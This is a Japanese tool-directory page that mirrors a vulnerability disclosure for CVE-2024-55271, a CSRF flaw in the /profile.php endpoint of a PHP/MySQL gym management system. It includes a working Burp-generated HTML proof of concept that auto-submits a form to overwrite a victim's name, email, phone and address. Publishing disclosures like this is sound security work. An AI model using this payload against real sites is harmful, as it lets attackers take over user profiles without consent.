Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-55271 — PHPとMYSQLを使用したジム管理システム | Kitploit
ツール/GitHubGitHub/shoaibalam112/cve-2024-55271
脆弱性分析ウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト学習と教育
GitHubshoaibalam112/cve-2024-55271

CVE-2024-55271

PHPとMYSQLを使用したジム管理システム

リポジトリを見る
7ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

ジム管理システム ( CVE-2024-55271 )

PHPとMySQLを使用して構築されたジム管理システムです。

監査者

Shoaib Alam - LinkedInプロフィール

説明

プロフィール更新機能におけるCSRF脆弱性

ジム管理システムに、クロスサイトリクエストフォージェリ(CSRF)の脆弱性が確認されました。この問題は、ユーザーパネルのプロフィール更新機能に存在します。

このアプリケーションには現在、Anti-CSRFトークンが実装されていないため、クロスサイトリクエストフォージェリ(CSRF)攻撃に対して脆弱です。このセキュリティ上の弱点は、特に /profile.php エンドポイントに影響します。攻撃者はこの欠陥を悪用して、住所、氏名、電話番号などの機密のユーザー情報を不正に変更することができます。これにより、ユーザーアカウントの整合性が損なわれ、さらなるセキュリティ問題を引き起こす可能性があります。

脆弱なエンドポイント: /profile.php

概念実証(PoC)

以下は、CSRFの脆弱性を示す概念実証です。このPoCは、Burp Suite Professionalを使用して生成されました。

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://localhost/gym/profile.php" method="POST">
      <input type="hidden" name="fname" value="hacked" />
      <input type="hidden" name="lname" value="victim" />
      <input type="hidden" name="email" value="attacker&#64;gmail&#46;com" />
      <input type="hidden" name="mobile" value="9999999999" />
      <input type="hidden" name="state" value="hacked" />
      <input type="hidden" name="city" value="hacked" />
      <input type="hidden" name="address" value="hacked" />
      <input type="hidden" name="submit" value="Update" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
ツールをダウンロード